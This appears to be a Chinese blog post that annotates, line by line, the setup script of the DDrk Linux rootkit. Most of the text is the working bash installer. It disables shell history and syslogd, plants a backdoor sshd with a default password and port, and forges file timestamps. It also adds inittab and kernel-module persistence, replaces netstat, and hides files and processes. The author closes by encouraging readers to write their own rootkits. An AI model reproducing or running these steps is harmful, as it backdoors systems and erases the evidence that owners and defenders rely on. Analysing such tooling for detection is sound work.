DDrk源码分析
DDrk是一个名气比较大的rootkit,下面是setup安装程序的脚本,而像里面用的netstat、tty、ttymon 等程序是直接编译好的,所以我也无法查看其源代码。不过也大多是对正常的文件源码的基础上进行修改以达到隐藏文件和进程的目的。虽然该脚本上大多有英文注释,我在原基础上也再添加些吧!呵呵
……
#!/bin/bash
##########define variables##########
DEFPASS=123456
DEFPORT=43958
BASEDIR=pwd
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
//不设置history记录
unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
//检查是否为root,只有root 权限才可以执行该安装,并生效
##########check is root##########
if [ “$(whoami)” != “root” ]; then
echo “BECOME ROOT AND TRY AGAIN”
echo “”
exit
fi
//解压sshd后门所需要的包
##########extract all tar##########
tar zxf bin.tgz
cd bin
tar zxf sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz
cd $BASEDIR
//强制结束syslogd 日志记录
##########kill syslogd##########
killall -9 syslogd >/dev/null 2>&1
sleep 2
//创建后门密码文件
##########remove sh.conf##########
if [ -f /etc/sh.conf ]; then
rm -rf /etc/sh.conf
fi
//对密码进行md5加密
#########initialize sshd configuration##########
if test -n “$1” ; then
echo “Using Password : $1”
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf
else
echo “No Password Specified, using default – $DEFPASS”
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
//将密码文件的修改时间和ls相同且为root属主
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
//配置rootkit端口信息
if test -n “$2” ; then
echo “Using ssh-port : $2”
echo “Port $2” >> $BASEDIR/bin/.sh/sshd_config
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo “No ssh-port Specified, using default – $DEFPORT”
echo “Port $DEFPORT” >> $BASEDIR/bin/.sh/sshd_config
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
创建后门利用目录,并将相关后门配置文件移到定义的目录中
###########creating dirs##########
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
if [ -d /lib/libsh.so ]; then
rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR
if [ -f /sbin/ttyload ]; then
//修改ttyload文件的属性,具体可以看我的chattr 用法的文章
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
kill -9 pidof ttyload >/dev/null 2>&1
mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
kill -9 pidof ttymon >/dev/null 2>&1
cp /bin/bash $SSHDIR
//设置开机启动
##########modify inittab##########
cp /etc/inittab /etc/.inittab
sed -e ‘s@^1:2345@0:2345:once:/usr/sbin/ttyloadn&@’ /etc/inittab > /etc/.inittab
touch -acmr /etc/inittab /etc/.inittab
mv -f /etc/.inittab /etc/inittab
echo “/sbin/ttyload -q > /dev/null 2>&1” > /usr/sbin/ttyload
echo “/sbin/ttymon > /dev/null 2>&1” >> /usr/sbin/ttyload
echo “${HOMEDIR}/tty i pidof ttyload > /dev/null 2>&1” >> /usr/sbin/ttyload
echo “${HOMEDIR}/tty i pidof ttymon > /dev/null 2>&1” >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod 755 /usr/sbin/ttyload
/usr/sbin/ttyload > /dev/null 2>&1
touch -amcr /bin/ls /etc/inittab
/*添加的内容如下:
# Run gettys in standard runlevels
0:2345:once:/usr/sbin/ttyload
0:2345:once:/usr/sbin/ttyload
0:2345:once:/usr/sbin/ttyload
0:2345:once:/usr/sbin/ttyload
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm –nodaemon */
//确保修改inittab文件成功,不成功时进行提示
###########make sure inittab has modified##########
if [ ! “grep ttyload /etc/inittab” ]; then
echo “# WARNING – SSHD WONT BE RELOADED UPON RESTART “
echo “# inittab shuffling probly fucked-up ! “
fi
//装载内核模块
##########load rk.ko##########
cd $BASEDIR
modprobe -r ehci-hcd
mv -f rk.ko /lib/modules/uname -r/kernel/drivers/usb/host/ehci-hcd.ko
modprobe ehci-hcd
mv tty $HOMEDIR
//替换netstat
##########replace netstat##########
touch -acmr /bin/netstat netstat
mv -f netstat /bin/netstat
//tty用于隐藏进程和文件,可以./tty -h查看帮助,不过设置属性时不要加”-”,这是和一般的linux 命令有区别的
##########hide all files and process##########
$HOMEDIR/tty h /etc/sh.conf > /dev/null 2>&1
$HOMEDIR/tty h /lib/libsh.so > /dev/null 2>&1
$HOMEDIR/tty h /usr/lib/libsh > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /usr/sbin/ttyload > /dev/null 2>&1
$HOMEDIR/tty h /sbin/ttymon > /dev/null 2>&1
$HOMEDIR/tty i pidof ttyload > /dev/null 2>&1
$HOMEDIR/tty i pidof ttymon > /dev/null 2>&1
##########load rk.ko on boot##########
cat > /etc/sysconfig/modules/ehci.modules
#!/bin/sh
#install usb modules support
modprobe -r ehci-hcd
modprobe ehci-hcd
EOF
touch -amcr /bin/ls /etc/sysconfig/modules/ehci.modules
chmod 755 /etc/sysconfig/modules/ehci.modules
$HOMEDIR/tty h /etc/sysconfig/modules/ehci.modules > /dev/null 2>&1
##########check iptables setting##########
if [ -f /sbin/iptables ]; then
echo “/sbin/iptables -L INPUT | head -5”
else
echo “”
echo “# lucky for u no iptables found”
fi
//禁止日志产生
##########start syslogd##########
/sbin/syslogd -m 0
写在最后,有兴趣自己写rootkit的朋友,最好先去研究下内核和程序源码。因为目前大多网上只要能载到的rootkit都逃不过被chkrootkit查出来的危险。而不能被查出的,我们在网上估计也找不到.
捐赠本站(Donate)
如您感觉文章有用,可扫码捐赠本站!(If the article useful, you can scan the QR code to donate))
- Author: shisekong
- Link: https://blog.361way.com/ddrk/1074.html
- License: This work is under a 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议. Kindly fulfill the requirements of the aforementioned License when adapting or creating a derivative of this work.